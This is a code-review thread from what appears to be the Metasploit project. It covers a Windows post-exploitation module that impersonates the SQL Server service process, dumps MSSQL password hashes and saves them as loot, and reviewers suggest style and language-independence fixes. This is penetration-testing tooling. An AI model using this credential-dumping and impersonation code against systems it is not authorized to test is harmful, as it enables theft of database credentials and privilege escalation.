modules/post/windows/manage/mssql_local_hashdump.rb

```diff
@@ -0,0 +1,430 @@
+      hash = row.strip.split(":")[1]
+
+      service_data = {
+      address: ::Rex::Socket.getaddress(rhost,true),
+      port: rport,
+      service_name: 'mssql',
+      protocol: 'tcp',
+      workspace_id: myworkspace_id
+      }
+
+      # Initialize Metasploit::Credential::Core object
+      credential_data = {
+        post_reference_name: refname,
+        origin_type: :session,
+        private_type: :nonreplayable_hash,
+        private_data: hash,
+        username: user,
+        session_id: session_db_id,
+        jtr_format: hashtype,
+        workspace_id: myworkspace_id
+      }
+
+      credential_data.merge!(service_data)
+
+      # Create the Metasploit::Credential::Core object
+      credential_core = create_credential(credential_data)
+
+      # Assemble the options hash for creating the Metasploit::Credential::Login object
+      login_data = {
+        core: credential_core,
+        status: Metasploit::Model::Login::Status::UNTRIED
+      }
+
+      # Merge in the service data and create our Login
+      login_data.merge!(service_data)
+      login = create_credential_login(login_data)
+
+      print_good("#{rhost} Saving = #{user}:#{hash}")
+
+      loot_hashes << user+":"+hash+"\n"
+ 
+    end
+    if loot_hashes != "" 
+        # Store MSSQL password hash as loot
+        loot_path = store_loot('mssql.hash', 'text/plain', session, loot_hashes, 'mssql_hashdump.txt', 'MSSQL Password Hash')
+        print_good("MSSQL password hash saved in: #{loot_path}")
+        return 1
+    else
+        return 0
+    end
+  end
+
+  ## ----------------------------------------------
+  ## Method for executing cmd and returning the response
+  ## Note: This is from one of Jabra's modules - Thanks man!
+  ##----------------------------------------------
+  def run_cmd(cmd,token=true)
+    opts = {'Hidden' => true, 'Channelized' => true, 'UseThreadToken' => token}
+    process = session.sys.process.execute(cmd, nil, opts)
+    res = ""
+    while (d = process.channel.read)
+      break if d == ""
+      res << d
+    end
+    process.channel.close
+    process.close
+    return res
+  end
+
+
+  ## ----------------------------------------------
+  ## Method for impersonating sql server instance
+  ## Taken from mssql_local_auth_bypass
+  ## Thanks Scott Sutherland !
+  ## ----------------------------------------------
+  def impersonate_sql_user(service_instance,verbose)
+
+    # Print the current user
+    blah = session.sys.config.getuid if verbose == "true"
+    print_status("Current user: #{blah}") if verbose == "true"
+
+    # Define target user/pid
+    targetuser = ""
+    targetpid = ""
+
+    # Identify SQL Server service processes
+    print_status("Searching for sqlservr.exe processes not running as SYSTEM...")
+    session.sys.process.get_processes().each do |x|
+
+      # Search for all sqlservr.exe processes
+      if ( x['name'] == "sqlservr.exe" and x['user'] != "NT AUTHORITY\\SYSTEM")
```

Comment:
No need for the parens, and && is preferred over and.

```Ruby
 x['name'] == "sqlservr.exe" && x['user'] != "NT AUTHORITY\\SYSTEM"
```


> On Feb 23, 2015, at 4:26 PM, Meatballs1 <notifications@github.com> wrote:
> 
> In modules/post/windows/manage/mssql_local_hashdump.rb <https://github.com/rapid7/metasploit-framework/pull/4822#discussion_r25209155>:
> 
> > +  def impersonate_sql_user(service_instance,verbose)
> > +
> > +    # Print the current user
> > +    blah = session.sys.config.getuid if verbose == "true"
> > +    print_status("Current user: #{blah}") if verbose == "true"
> > +
> > +    # Define target user/pid
> > +    targetuser = ""
> > +    targetpid = ""
> > +
> > +    # Identify SQL Server service processes
> > +    print_status("Searching for sqlservr.exe processes not running as SYSTEM...")
> > +    session.sys.process.get_processes().each do |x|
> > +
> > +      # Search for all sqlservr.exe processes
> > +      if ( x['name'] == "sqlservr.exe" and x['user'] != "NT AUTHORITY\\SYSTEM")
> This check wont work on other languages. Can you follow the is_system? approach in https://github.com/rapid7/metasploit-framework/blob/master/lib/msf/core/post/windows/priv.rb <https://github.com/rapid7/metasploit-framework/blob/master/lib/msf/core/post/windows/priv.rb> which resolves the SID so it will be language independent?
> 
> —
> Reply to this email directly or view it on GitHub <https://github.com/rapid7/metasploit-framework/pull/4822/files#r25209155>.
>